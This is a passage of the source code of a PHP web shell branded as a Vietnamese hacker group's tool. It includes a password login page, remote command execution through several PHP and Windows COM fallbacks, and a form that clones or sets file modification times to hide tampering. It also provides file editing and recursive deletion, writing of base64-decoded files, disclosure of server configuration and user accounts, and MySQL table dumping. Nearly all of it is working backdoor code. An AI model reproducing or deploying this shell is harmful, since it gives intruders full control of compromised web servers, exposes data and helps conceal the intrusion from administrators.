1369 $contents = htmlspecialchars($contents);
1370 }
1371 formhead(array('title' => 'Create / Edit File'));
1372 makehide('action', 'file');
1373 makehide('dir', $nowpath);
1374 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1375 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1376 formfooter();
1377 } //end editfile
1378 elseif ($action == 'newtime') {
1379 $opfilemtime = @filemtime($opfile);
1380 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1381 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1382 formhead(array('title' => 'Clone file was last modified time'));
1383 makehide('action', 'file');
1384 makehide('dir', $nowpath);
1385 makeinput(array('title' => 'Alter file', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1386 makeinput(array('title' => 'Reference file (fullpath)', 'name' => 'tarfile', 'size' => 120, 'newline' => 1));
1387 formfooter();
1388 formhead(array('title' => 'Set last modified'));
1389 makehide('action', 'file');
1390 makehide('dir', $nowpath);
1391 makeinput(array('title' => 'Current file (fullpath)', 'name' => 'curfile', 'value' => $opfile, 'size' => 120, 'newline' => 1));
1392 p('<p>Instead »');
1393 p('year:');
1394 makeinput(array('name' => 'year', 'value' => date('Y', $opfilemtime), 'size' => 4));
1395 p('month:');
1396 makeinput(array('name' => 'month', 'value' => date('m', $opfilemtime), 'size' => 2));
1397 p('day:');
1398 makeinput(array('name' => 'day', 'value' => date('d', $opfilemtime), 'size' => 2));
1399 p('hour:');
1400 makeinput(array('name' => 'hour', 'value' => date('H', $opfilemtime), 'size' => 2));
1401 p('minute:');
1402 makeinput(array('name' => 'minute', 'value' => date('i', $opfilemtime), 'size' => 2));
1403 p('second:');
1404 makeinput(array('name' => 'second', 'value' => date('s', $opfilemtime), 'size' => 2));
1405 p('</p>');
1406 formfooter();
1407 } //end newtime
1408 elseif ($action == 'shell') {
1409 if (IS_WIN && IS_COM) {
1410 if ($program && $parameter) {
1411 $shell = new COM('Shell.Application');
1412 $a = $shell->ShellExecute($program, $parameter);
1413 m('Program run has ' . (!$a ? 'success' : 'fail'));
1414 }
1415 !$program && $program = 'c:\windows\system32\cmd.exe';
1416 !$parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt';
1417 formhead(array('title' => 'Execute Program'));
1418 makehide('action', 'shell');
1419 makeinput(array('title' => 'Program', 'name' => 'program', 'value' => $program, 'newline' => 1));
1420 p('<p>');
1421 makeinput(array('title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter));
1422 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1423 p('</p>');
1424 formfoot();
1425 }
1426 formhead(array('title' => 'Execute Command'));
1427 makehide('action', 'shell');
1428 if (IS_WIN && IS_COM) {
1429 $execfuncdb = array('phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open');
1430 makeselect(array('title' => 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline' => 1));
1431 }
1432 p('<p>');
1433 makeinput(array('title' => 'Command', 'name' => 'command', 'value' => $command));
1434 makeinput(array('name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute'));
1435 p('</p>');
1436 formfoot();
1437 if ($command) {
1438 p('<hr width="100%" noshade /><pre>');
1439 if ($execfunc == 'wscript' && IS_WIN && IS_COM) {
1440 $wsh = new COM('WScript.shell');
1441 $exec = $wsh->exec('cmd.exe /c ' . $command);
1442 $stdout = $exec->StdOut();
1443 $stroutput = $stdout->ReadAll();
1444 echo $stroutput;
1445 } elseif ($execfunc == 'proc_open' && IS_WIN && IS_COM) {
1446 $descriptorspec = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
1447 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1448 if (is_resource($process)) {
1449 fwrite($pipes[0], $command . "\r\n");
1450 fwrite($pipes[0], "exit\r\n");
1451 fclose($pipes[0]);
1452 while (!feof($pipes[1])) {
1453 echo fgets($pipes[1], 1024);
1454 }
1455 fclose($pipes[1]);
1456 while (!feof($pipes[2])) {
1457 echo fgets($pipes[2], 1024);
1458 }
1459 fclose($pipes[2]);
1460 proc_close($process);
1461 }
1462 } else {
1463 echo (execute($command));
1464 }
1465 p('</pre>');
1466 }
1467 } //end shell
1468 elseif ($action == 'phpenv') {
1469 $upsize = getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
1470 $adminmail = isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
1471 !$dis_func && $dis_func = 'No';
1472 $info = array(1 => array('Server Time', date('Y/m/d h:i:s', $timestamp)), 2 => array('Server Domain', $_SERVER['SERVER_NAME']), 3 => array('Server IP', gethostbyname($_SERVER['SERVER_NAME'])), 4 => array('Server OS', PHP_OS), 5 => array('Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE']), 6 => array('Server Software', $_SERVER['SERVER_SOFTWARE']), 7 => array('Server Web Port', $_SERVER['SERVER_PORT']), 8 => array('PHP run mode', strtoupper(php_sapi_name())), 9 => array('The file path', __FILE__), 10 => array('PHP Version', PHP_VERSION), 11 => array('PHPINFO', (IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')), 12 => array('Safe Mode', getcfg('safe_mode')), 13 => array('Administrator', $adminmail), 14 => array('allow_url_fopen', getcfg('allow_url_fopen')), 15 => array('enable_dl', getcfg('enable_dl')), 16 => array('display_errors', getcfg('display_errors')), 17 => array('register_globals', getcfg('register_globals')), 18 => array('magic_quotes_gpc', getcfg('magic_quotes_gpc')), 19 => array('memory_limit', getcfg('memory_limit')), 20 => array('post_max_size', getcfg('post_max_size')), 21 => array('upload_max_filesize', $upsize), 22 => array('max_execution_time', getcfg('max_execution_time') . ' second(s)'), 23 => array('disable_functions', $dis_func),);
1473 if ($phpvarname) {
1474 m($phpvarname . ' : ' . getcfg($phpvarname));
1475 }
1476 formhead(array('title' => 'Server environment'));
1477 makehide('action', 'phpenv');
1478 makeinput(array('title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)', 'name' => 'phpvarname', 'value' => $phpvarname, 'newline' => 1));
1479 formfooter();
1480 $hp = array(0 => 'Server', 1 => 'PHP');
1481 for ($a = 0;$a < 2;$a++) {
1482 p('<h2>' . $hp[$a] . ' »</h2>');
1483 p('<ul class="info">');
1484 if ($a == 0) {
1485 for ($i = 1;$i <= 9;$i++) {
1486 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1487 }
1488 } elseif ($a == 1) {
1489 for ($i = 10;$i <= 23;$i++) {
1490 p('<li><u>' . $info[$i][0] . ':</u>' . $info[$i][1] . '</li>');
1491 }
1492 }
1493 p('</ul>');
1494 }
1495 } //end phpenv
1496 else {
1497 m('Undefined Action');
1498 }
1499 ?>
1500 </td></tr></table>
1501 <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1502 <span style="float:right;"><?php debuginfo();
1503 ob_end_flush(); ?></span>
1504 Copyright (C) 2004-2010 <B></B> - Develop by <a href=http://beyeugroup.com target=_blank><B>BYG </B></a> - <B>- The Legend of Vietnamese Hacker World</B> All Rights Reserved.
1505 </div>
1506 </body>
1507 </html>
1508
1509 <?php
1510 /*======================================================
1511 Show info shell
1512 ======================================================*/
1513 function m($msg) {
1514 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1515 echo $msg;
1516 echo '</div>';
1517 }
1518 function scookie($key, $value, $life = 0, $prefix = 1) {
1519 global $admin, $timestamp, $_SERVER;
1520 $key = ($prefix ? $admin['cookiepre'] : '') . $key;
1521 $life = $life ? $life : $admin['cookielife'];
1522 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1523 setcookie($key, $value, $timestamp + $life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1524 }
1525 function multi($num, $perpage, $curpage, $tablename) {
1526 $multipage = '';
1527 if ($num > $perpage) {
1528 $page = 10;
1529 $offset = 5;
1530 $pages = @ceil($num / $perpage);
1531 if ($page > $pages) {
1532 $from = 1;
1533 $to = $pages;
1534 } else {
1535 $from = $curpage - $offset;
1536 $to = $curpage + $page - $offset - 1;
1537 if ($from < 1) {
1538 $to = $curpage + 1 - $from;
1539 $from = 1;
1540 if (($to - $from) < $page && ($to - $from) < $pages) {
1541 $to = $page;
1542 }
1543 } elseif ($to > $pages) {
1544 $from = $curpage - $pages + $to;
1545 $to = $pages;
1546 if (($to - $from) < $page && ($to - $from) < $pages) {
1547 $from = $pages - $page + 1;
1548 }
1549 }
1550 }
1551 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', 1);">First</a> ' : '') . ($curpage > 1 ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage - 1) . ');">Prev</a> ' : '');
1552 for ($i = $from;$i <= $to;$i++) {
1553 $multipage.= $i == $curpage ? $i . ' ' : '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $i . ');">[' . $i . ']</a> ';
1554 }
1555 $multipage.= ($curpage < $pages ? '<a href="javascript:settable(\'' . $tablename . '\', \'\', ' . ($curpage + 1) . ');">Next</a>' : '') . ($to < $pages ? ' <a href="javascript:settable(\'' . $tablename . '\', \'\', ' . $pages . ');">Last</a>' : '');
1556 $multipage = $multipage ? '<p>Pages: ' . $multipage . '</p>' : '';
1557 }
1558 return $multipage;
1559 }
1560 // Login page
1561 function loginpage() {
1562 ?>
1563 <html>
1564 <head>
1565
1566 <body bgcolor=black background=1.jpg>
1567
1568 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1569 <title>BYG - The Legend of Vietnamese Hacker World </title>
1570 <style type="text/css">
1571 A:link {text-decoration: none; color: green }
1572 A:visited {text-decoration: none;color:red}
1573 A:active {text-decoration: none}
1574 A:hover {text-decoration: underline; color: green;}
1575 input, textarea, button
1576 {
1577 font-size: 11pt;
1578 color: #FFFFFF;
1579 font-family: verdana, sans-serif;
1580 background-color: #000000;
1581 border-left: 2px dashed #8B0000;
1582 border-top: 2px dashed #8B0000;
1583 border-right: 2px dashed #8B0000;
1584 border-bottom: 2px dashed #8B0000;
1585 }
1586
1587 </style>
1588
1589 <BR><BR>
1590 <div align=center >
1591
1592 <div>
1593 <font color=gray>
1594 <br /><br /><br /><br /><br />
1595
1596 <form method="POST" action="">
1597 <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1598 <input type="hidden" name="doing" value="login">
1599 <input type="submit" value="Login">
1600 </form>
1601 <BR>
1602 <?php
1603 echo "" . $err_mess . "";
1604 ?>
1605
1606 <B><font color=red>
1607
1608
1609
1610
1611
1612
1613 </div>
1614
1615
1616 </fieldset>
1617
1618
1619
1620 </head>
1621 </html>
1622
1623
1624 <?php
1625 exit;
1626 } //end loginpage()
1627 function execute($cfe) {
1628 $res = '';
1629 if ($cfe) {
1630 if (function_exists('exec')) {
1631 @exec($cfe, $res);
1632 $res = join("\n", $res);
1633 } elseif (function_exists('shell_exec')) {
1634 $res = @shell_exec($cfe);
1635 } elseif (function_exists('system')) {
1636 @ob_start();
1637 @system($cfe);
1638 $res = @ob_get_contents();
1639 @ob_end_clean();
1640 } elseif (function_exists('passthru')) {
1641 @ob_start();
1642 @passthru($cfe);
1643 $res = @ob_get_contents();
1644 @ob_end_clean();
1645 } elseif (@is_resource($f = @popen($cfe, "r"))) {
1646 $res = '';
1647 while (!@feof($f)) {
1648 $res.= @fread($f, 1024);
1649 }
1650 @pclose($f);
1651 }
1652 }
1653 return $res;
1654 }
1655 function which($pr) {
1656 $path = execute("which $pr");
1657 return ($path ? $path : $pr);
1658 }
1659 function cf($fname, $text) {
1660 if ($fp = @fopen($fname, 'w')) {
1661 @fputs($fp, base64_decode($text));
1662 @fclose($fp);
1663 }
1664 }
1665 // Debug
1666 function debuginfo() {
1667 global $starttime;
1668 $mtime = explode(' ', microtime());
1669 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1670 echo 'Processed in ' . $totaltime . ' second(s)';
1671 }
1672 // Function connect database
1673 function dbconn($dbhost, $dbuser, $dbpass, $dbname = '', $charset = '', $dbport = '3306') {
1674 if (!$link = @mysql_connect($dbhost . ':' . $dbport, $dbuser, $dbpass)) {
1675 p('<h2>Can not connect to MySQL server</h2>');
1676 exit;
1677 }
1678 if ($link && $dbname) {
1679 if (!@mysql_select_db($dbname, $link)) {
1680 p('<h2>Database selected has error</h2>');
1681 exit;
1682 }
1683 }
1684 if ($link && mysql_get_server_info() > '4.1') {
1685 if (in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1686 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1687 }
1688 }
1689 return $link;
1690 }
1691 // Array strip
1692 function s_array(&$array) {
1693 if (is_array($array)) {
1694 foreach ($array as $k => $v) {
1695 $array[$k] = s_array($v);
1696 }
1697 } else if (is_string($array)) {
1698 $array = stripslashes($array);
1699 }
1700 return $array;
1701 }
1702 // HTML Strip
1703 function html_clean($content) {
1704 $content = htmlspecialchars($content);
1705 $content = str_replace("\n", "<br />", $content);
1706 $content = str_replace(" ", " ", $content);
1707 $content = str_replace("\t", " ", $content);
1708 return $content;
1709 }
1710 // Chmod
1711 function getChmod($filepath) {
1712 return substr(base_convert(@fileperms($filepath), 10, 8), -4);
1713 }
1714 function getPerms($filepath) {
1715 $mode = @fileperms($filepath);
1716 if (($mode & 0xC000) === 0xC000) {
1717 $type = 's';
1718 } elseif (($mode & 0x4000) === 0x4000) {
1719 $type = 'd';
1720 } elseif (($mode & 0xA000) === 0xA000) {
1721 $type = 'l';
1722 } elseif (($mode & 0x8000) === 0x8000) {
1723 $type = '-';
1724 } elseif (($mode & 0x6000) === 0x6000) {
1725 $type = 'b';
1726 } elseif (($mode & 0x2000) === 0x2000) {
1727 $type = 'c';
1728 } elseif (($mode & 0x1000) === 0x1000) {
1729 $type = 'p';
1730 } else {
1731 $type = '?';
1732 }
1733 $owner['read'] = ($mode & 00400) ? 'r' : '-';
1734 $owner['write'] = ($mode & 00200) ? 'w' : '-';
1735 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1736 $group['read'] = ($mode & 00040) ? 'r' : '-';
1737 $group['write'] = ($mode & 00020) ? 'w' : '-';
1738 $group['execute'] = ($mode & 00010) ? 'x' : '-';
1739 $world['read'] = ($mode & 00004) ? 'r' : '-';
1740 $world['write'] = ($mode & 00002) ? 'w' : '-';
1741 $world['execute'] = ($mode & 00001) ? 'x' : '-';
1742 if ($mode & 0x800) {
1743 $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
1744 }
1745 if ($mode & 0x400) {
1746 $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
1747 }
1748 if ($mode & 0x200) {
1749 $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';
1750 }
1751 return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute'];
1752 }
1753 function getUser($filepath) {
1754 if (function_exists('posix_getpwuid')) {
1755 $array = @posix_getpwuid(@fileowner($filepath));
1756 if ($array && is_array($array)) {
1757 return ' / <a href="#" title="User: ' . $array['name'] . '
Passwd: ' . $array['passwd'] . '
Uid: ' . $array['uid'] . '
gid: ' . $array['gid'] . '
Gecos: ' . $array['gecos'] . '
Dir: ' . $array['dir'] . '
Shell: ' . $array['shell'] . '">' . $array['name'] . '</a>';
1758 }
1759 }
1760 return '';
1761 }
1762 // Delete dir
1763 function deltree($deldir) {
1764 $mydir = @dir($deldir);
1765 while ($file = $mydir->read()) {
1766 if ((is_dir($deldir . '/' . $file)) && ($file != '.') && ($file != '..')) {
1767 @chmod($deldir . '/' . $file, 0777);
1768 deltree($deldir . '/' . $file);
1769 }
1770 if (is_file($deldir . '/' . $file)) {
1771 @chmod($deldir . '/' . $file, 0777);
1772 @unlink($deldir . '/' . $file);
1773 }
1774 }
1775 $mydir->close();
1776 @chmod($deldir, 0777);
1777 return @rmdir($deldir) ? 1 : 0;
1778 }
1779 // Background
1780 function bg() {
1781 global $bgc;
1782 return ($bgc++ % 2 == 0) ? 'alt1' : 'alt2';
1783 }
1784 // Get path
1785 function getPath($scriptpath, $nowpath) {
1786 if ($nowpath == '.') {
1787 $nowpath = $scriptpath;
1788 }
1789 $nowpath = str_replace('\\', '/', $nowpath);
1790 $nowpath = str_replace('//', '/', $nowpath);
1791 if (substr($nowpath, -1) != '/') {
1792 $nowpath = $nowpath . '/';
1793 }
1794 return $nowpath;
1795 }
1796 // Get up path
1797 function getUpPath($nowpath) {
1798 $pathdb = explode('/', $nowpath);
1799 $num = count($pathdb);
1800 if ($num > 2) {
1801 unset($pathdb[$num - 1], $pathdb[$num - 2]);
1802 }
1803 $uppath = implode('/', $pathdb) . '/';
1804 $uppath = str_replace('//', '/', $uppath);
1805 return $uppath;
1806 }
1807 // Config
1808 function getcfg($varname) {
1809 $result = get_cfg_var($varname);
1810 if ($result == 0) {
1811 return 'No';
1812 } elseif ($result == 1) {
1813 return 'Yes';
1814 } else {
1815 return $result;
1816 }
1817 }
1818 // Function name
1819 function getfun($funName) {
1820 return (false !== function_exists($funName)) ? 'Yes' : 'No';
1821 }
1822 function GetList($dir) {
1823 global $dirdata, $j, $nowpath;
1824 !$j && $j = 1;
1825 if ($dh = opendir($dir)) {
1826 while ($file = readdir($dh)) {
1827 $f = str_replace('//', '/', $dir . '/' . $file);
1828 if ($file != '.' && $file != '..' && is_dir($f)) {
1829 if (is_writable($f)) {
1830 $dirdata[$j]['filename'] = str_replace($nowpath, '', $f);
1831 $dirdata[$j]['mtime'] = @date('Y-m-d H:i:s', filemtime($f));
1832 $dirdata[$j]['dirchmod'] = getChmod($f);
1833 $dirdata[$j]['dirperm'] = getPerms($f);
1834 $dirdata[$j]['dirlink'] = ue($dir);
1835 $dirdata[$j]['server_link'] = $f;
1836 $dirdata[$j]['client_link'] = ue($f);
1837 $j++;
1838 }
1839 GetList($f);
1840 }
1841 }
1842 closedir($dh);
1843 clearstatcache();
1844 return $dirdata;
1845 } else {
1846 return array();
1847 }
1848 }
1849 function qy($sql) {
1850 //echo $sql.'<br>';
1851 $res = $error = '';
1852 if (!$res = @mysql_query($sql)) {
1853 return 0;
1854 } else if (is_resource($res)) {
1855 return 1;
1856 } else {
1857 return 2;
1858 }
1859 return 0;
1860 }
1861 function q($sql) {
1862 return @mysql_query($sql);
1863 }
1864 function fr($qy) {
1865 mysql_free_result($qy);
1866 }
1867 function sizecount($size) {
1868 if ($size > 1073741824) {
1869 $size = round($size / 1073741824 * 100) / 100 . ' G';
1870 } elseif ($size > 1048576) {
1871 $size = round($size / 1048576 * 100) / 100 . ' M';
1872 } elseif ($size > 1024) {
1873 $size = round($size / 1024 * 100) / 100 . ' K';
1874 } else {
1875 $size = $size . ' B';
1876 }
1877 return $size;
1878 }
1879 // Zip
1880 class PHPZip {
1881 var $out = '';
1882 function PHPZip($dir) {
1883 if (@function_exists('gzcompress')) {
1884 $curdir = getcwd();
1885 if (is_array($dir)) $filelist = $dir;
1886 else {
1887 $filelist = $this->GetFileList($dir); //File list
1888 foreach ($filelist as $k => $v) $filelist[] = substr($v, strlen($dir) + 1);
1889 }
1890 if ((!empty($dir)) && (!is_array($dir)) && (file_exists($dir))) chdir($dir);
1891 else chdir($curdir);
1892 if (count($filelist) > 0) {
1893 foreach ($filelist as $filename) {
1894 if (is_file($filename)) {
1895 $fd = fopen($filename, 'r');
1896 $content = @fread($fd, filesize($filename));
1897 fclose($fd);
1898 if (is_array($dir)) $filename = basename($filename);
1899 $this->addFile($content, $filename);
1900 }
1901 }
1902 $this->out = $this->file();
1903 chdir($curdir);
1904 }
1905 return 1;
1906 } else return 0;
1907 }
1908 // Show file list
1909 function GetFileList($dir) {
1910 static $a;
1911 if (is_dir($dir)) {
1912 if ($dh = opendir($dir)) {
1913 while ($file = readdir($dh)) {
1914 if ($file != '.' && $file != '..') {
1915 $f = $dir . '/' . $file;
1916 if (is_dir($f)) $this->GetFileList($f);
1917 $a[] = $f;
1918 }
1919 }
1920 closedir($dh);
1921 }
1922 }
1923 return $a;
1924 }
1925 var $datasec = array();
1926 var $ctrl_dir = array();
1927 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
1928 var $old_offset = 0;
1929 function unix2DosTime($unixtime = 0) {
1930 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
1931 if ($timearray['year'] < 1980) {
1932 $timearray['year'] = 1980;
1933 $timearray['mon'] = 1;
1934 $timearray['mday'] = 1;
1935 $timearray['hours'] = 0;
1936 $timearray['minutes'] = 0;
1937 $timearray['seconds'] = 0;
1938 } // end if
1939 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
1940 }
1941 function addFile($data, $name, $time = 0) {
1942 $name = str_replace('\\', '/', $name);
1943 $dtime = dechex($this->unix2DosTime($time));
1944 $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1];
1945 eval('$hexdtime = "' . $hexdtime . '";');
1946 $fr = "\x50\x4b\x03\x04";
1947 $fr.= "\x14\x00";
1948 $fr.= "\x00\x00";
1949 $fr.= "\x08\x00";
1950 $fr.= $hexdtime;
1951 $unc_len = strlen($data);
1952 $crc = crc32($data);
1953 $zdata = gzcompress($data);
1954 $c_len = strlen($zdata);
1955 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
1956 $fr.= pack('V', $crc);
1957 $fr.= pack('V', $c_len);
1958 $fr.= pack('V', $unc_len);
1959 $fr.= pack('v', strlen($name));
1960 $fr.= pack('v', 0);
1961 $fr.= $name;
1962 $fr.= $zdata;
1963 $fr.= pack('V', $crc);
1964 $fr.= pack('V', $c_len);
1965 $fr.= pack('V', $unc_len);
1966 $this->datasec[] = $fr;
1967 $new_offset = strlen(implode('', $this->datasec));
1968 $cdrec = "\x50\x4b\x01\x02";
1969 $cdrec.= "\x00\x00";
1970 $cdrec.= "\x14\x00";
1971 $cdrec.= "\x00\x00";
1972 $cdrec.= "\x08\x00";
1973 $cdrec.= $hexdtime;
1974 $cdrec.= pack('V', $crc);
1975 $cdrec.= pack('V', $c_len);
1976 $cdrec.= pack('V', $unc_len);
1977 $cdrec.= pack('v', strlen($name));
1978 $cdrec.= pack('v', 0);
1979 $cdrec.= pack('v', 0);
1980 $cdrec.= pack('v', 0);
1981 $cdrec.= pack('v', 0);
1982 $cdrec.= pack('V', 32);
1983 $cdrec.= pack('V', $this->old_offset);
1984 $this->old_offset = $new_offset;
1985 $cdrec.= $name;
1986 $this->ctrl_dir[] = $cdrec;
1987 }
1988 function file() {
1989 $data = implode('', $this->datasec);
1990 $ctrldir = implode('', $this->ctrl_dir);
1991 return $data . $ctrldir . $this->eof_ctrl_dir . pack('v', sizeof($this->ctrl_dir)) . pack('v', sizeof($this->ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
1992 }
1993 }
1994 // Dump mysql
1995 function sqldumptable($table, $fp = 0) {
1996 $tabledump = "DROP TABLE IF EXISTS $table;\n";
1997 $tabledump.= "CREATE TABLE $table (\n";
1998 $firstfield = 1;
1999 $fields = q("SHOW FIELDS FROM $table");
2000 while ($field = mysql_fetch_array($fields)) {
2001 if (!$firstfield) {
2002 $tabledump.= ",\n";
2003 } else {
2004 $firstfield = 0;
2005 }
2006 $tabledump.= " $field[Field] $field[Type]";
2007 if (!empty($field["Default"])) {
2008 $tabledump.= " DEFAULT '$field[Default]'";
2009 }
2010 if ($field['Null'] != "YES") {
2011 $tabledump.= " NOT NULL";
2012 }
2013 if ($field['Extra'] != "") {
2014 $tabledump.= " $field[Extra]";
2015 }
2016 }
2017 fr($fields);
2018 $keys = q("SHOW KEYS FROM $table");
2019 while ($key = mysql_fetch_array($keys)) {
2020 $kname = $key['Key_name'];
2021 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2022 $kname = "UNIQUE|$kname";
2023 }
2024 if (!is_array($index[$kname])) {
2025 $index[$kname] = array();
2026 }
2027 $index[$kname][] = $key['Column_name'];
2028 }
2029 fr($keys);
2030 while (list($kname, $columns) = @each($index)) {
2031 $tabledump.= ",\n";
2032 $colnames = implode($columns, ",");
2033 if ($kname == "PRIMARY") {
2034 $tabledump.= " PRIMARY KEY ($colnames)";
2035 } else {
2036 if (substr($kname, 0, 6) == "UNIQUE") {
2037 $kname = substr($kname, 7);
2038 }
2039 $tabledump.= " KEY $kname ($colnames)";
2040 }
2041 }
2042 $tabledump.= "\n);\n\n";
2043 if ($fp) {
2044 fwrite($fp, $tabledump);
2045 } else {
2046 echo $tabledump;
2047 }
2048 $rows = q("SELECT * FROM $table");
2049 $numfields = mysql_num_fields($rows);
2050 while ($row = mysql_fetch_array($rows)) {
2051 $tabledump = "INSERT INTO $table VALUES(";
2052 $fieldcounter = - 1;
2053 $firstfield = 1;
2054 while (++$fieldcounter < $numfields) {
2055 if (!$firstfield) {
2056 $tabledump.= ", ";
2057 } else {
2058 $firstfield = 0;
2059 }
2060 if (!isset($row[$fieldcounter])) {
2061 $tabledump.= "NULL";
2062 } else {
2063 $tabledump.= "'" . mysql_escape_string($row[$fieldcounter]) . "'";
2064 }
2065 }
2066 $tabledump.= ");\n";
2067 if ($fp) {
2068 fwrite($fp, $tabledump);
2069 } else {
2070 echo $tabledump;
2071 }
2072 }
2073 fr($rows);
2074 if ($fp) {
2075 fwrite($fp, "\n");
2076 } else {
2077 echo "\n";
2078 }
2079 }
2080 function ue($str) {
2081 return urlencode($str);
2082 }
2083 function p($str) {
2084 echo $str . "\n";
2085 }
2086 function tbhead() {
2087 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2088 }
2089 function tbfoot() {
2090 p('</table>');
2091 }
2092 function makehide($name, $value = '') {
2093 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2094 }
2095 function makeinput($arg = array()) {
2096 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2097 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2098 !$arg['type'] && $arg['type'] = 'text';
2099 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2100 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2101 if ($arg['newline']) {
2102 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2103 } else {
2104 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2105 }
2106 }
2107 function makeselect($arg = array()) {
2108 if ($arg['onchange']) {
2109 $onchange = 'onchange="' . $arg['onchange'] . '"';
2110 }
2111 $arg['title'] = $arg['title'] ? $arg['title'] : '';
2112 if ($arg['newline']) p('<p>');
2113 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2114 if (is_array($arg['option'])) {
2115 foreach ($arg['option'] as $key => $value) {
2116 if ($arg['selected'] == $key) {
2117 p("<option value=\"$key\" selected>$value</option>");
2118 } else {
2119 p("<option value=\"$key\">$value</option>");
2120 }
2121 }
2122 }
2123 p("</select>");
2124 if ($arg['newline']) p('</p>');
2125 }
2126 function formhead($arg = array()) {
2127 !$arg['method'] && $arg['method'] = 'post';
2128 !$arg['action'] && $arg['action'] = $self;
2129 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2130 !$arg['name'] && $arg['name'] = 'form1';
2131 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2132 if ($arg['title']) {
2133 p('<h2>' . $arg['title'] . ' »</h2>');
2134 }
2135 }
2136 function maketext($arg = array()) {
2137 !$arg['cols'] && $arg['cols'] = 100;
2138 !$arg['rows'] && $arg['rows'] = 25;
2139 $arg['title'] = $arg['title'] ? $arg['title'] . '<br />' : '';
2140 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
2141 }
2142 function formfooter($name = '') {
2143 !$name && $name = 'submit';
2144 p('<p><input class="bt" name="' . $name . '" id=\"' . $name . '\" type="submit" value="Submit"></p>');
2145 p('</form>');
2146 }
2147 function formfoot() {
2148 p('</form>');
2149 }
2150 // Exit
2151 function pr($a) {
2152 echo '<pre>';
2153 print_r($a);
2154 echo '</pre>';
2155 }
2156 ?>